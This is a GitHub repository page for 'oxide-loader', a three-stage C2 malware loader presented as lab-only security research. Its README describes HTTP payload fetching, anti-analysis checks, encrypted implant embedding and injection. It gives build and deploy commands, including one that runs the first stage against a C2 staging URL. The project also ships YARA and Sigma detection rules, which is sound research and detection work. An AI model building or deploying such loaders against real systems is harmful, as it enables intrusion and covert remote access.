Skip to content

diemoeve/oxide-loader

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

21 Commits
builder
builder
 
 
detection
detection
 
 
stage1
stage1
 
 
stage2
stage2
 
 
stage3
stage3
 
 
tests
tests
 
 
.gitignore
.gitignore
 
 
CLAUDE.md
CLAUDE.md
 
 
DISCLAIMER.md
DISCLAIMER.md
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
builder.py
builder.py
 
 

Repository files navigation

oxide-loader

3-stage payload delivery chain for the oxide security research framework.

Lab use only. Default C2 is localhost. See DISCLAIMER.md.

Stages

Stage Language Role
stage1 C Fetches stage2 over HTTP. < 20 KB.
stage2 Rust Anti-analysis checks, fetches stage3.
stage3 Rust Decrypts embedded implant, injects or executes.

Build

cd stage1 && make
cd stage2 && cargo build --release
python3 builder.py \
  --implant ../oxide/target/release/oxide-implant \
  --psk oxide-lab-psk \
  --salt $(cat ../oxide/certs/salt.hex) \
  --out-rs stage3/src/payload.rs --rebuild

Deploy

Upload binaries to the oxide panel staging endpoint, then run stage1 on the target:

STAGE_URL=http://10.10.100.1:8080 ./stage1/build/stage1

builder.py

Encrypts the implant with AES-256-GCM (PBKDF2-derived key) and generates stage3/src/payload.rs for compile-time embedding.

python3 builder.py --help

Detection

detection/
├── yara/   stage1_magic.yar, stage1_xor.yar, stage1_imports.yar
└── sigma/  stage1_network.yml

ATT&CK: T1105, T1497, T1055, T1027.

Related

About

3-stage C2 payload loader with detection rules for each stage.

Topics

windows linux backdoor malware loader trojan rat shellcode evasion remote-access offensive-security red-team c2 command-and-control security-research blue-team purple-team detection-engineering pe-injection malware-loader

Resources

Readme

License

MIT license
Activity

Stars

2 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases 1

v0.1: Initial release Latest
Apr 14, 2026

Packages

 
 
 

Contributors

Languages